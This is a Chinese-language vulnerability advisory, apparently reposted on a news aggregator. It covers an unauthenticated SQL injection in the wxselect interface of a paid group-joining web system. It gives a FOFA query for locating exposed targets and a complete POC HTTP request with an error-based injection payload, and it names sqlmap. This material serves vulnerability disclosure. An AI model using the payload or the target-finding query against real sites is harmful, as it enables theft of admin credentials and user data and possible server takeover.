当前位置: 首页 > news >正文

九块九付费进群系统 wxselect SQL注入漏洞

news 2025/5/3 15:13:34

漏洞描述

九块九付费进群系统 wxselect 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

漏洞复现

FOFA

body="/website/index/login.html"

POC

POST /group/index/wxselect HTTP/1.1
Host: 
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 102orderid=') AND GTID_SUBSET(CONCAT((MID((IFNULL(CAST(MD5(123456) AS NCHAR),0x7e)),1,190))),5417)-- ylIU

bp

sqlmap


http://www.mrgr.cn/news/39196.html

相关文章:

  • Foo a30 = Foo(123);会调用哪些构造函数
  • 第十四周学习周报
  • 先刮腻子还是先装柜子好呢?
  • 系统数据文件和信息
  • 从传统 RAG 到图 RAG,赋予大型语言模型更强大的知识力量
  • Unity3D 创建一个人物,实现人物的移动
  • C++中的多态(详细讲解)
  • 【Android 14源码分析】Activity启动流程-1
  • CO-DETR追踪损失函数情况
  • 谷歌收录批量查询,如何批量查询谷歌收录以及提交网站进行收录的方法
  • 服务器开通个人账户
  • 初识Linux以及Linux的基本命令
  • UFS 3.1架构简介
  • 关于git分支冲突问题
  • Dynamics 365 dependency EntityType
  • 古代帝王与啤酒的不解之缘
  • 如果MySQL已经安装但mysql --version命令不好用,怎么办?
  • MySQL的驱动安装
  • Python——内置字符串操作与转换函数
  • 配置STM32F103的高级定时器TIM1用于PWM功能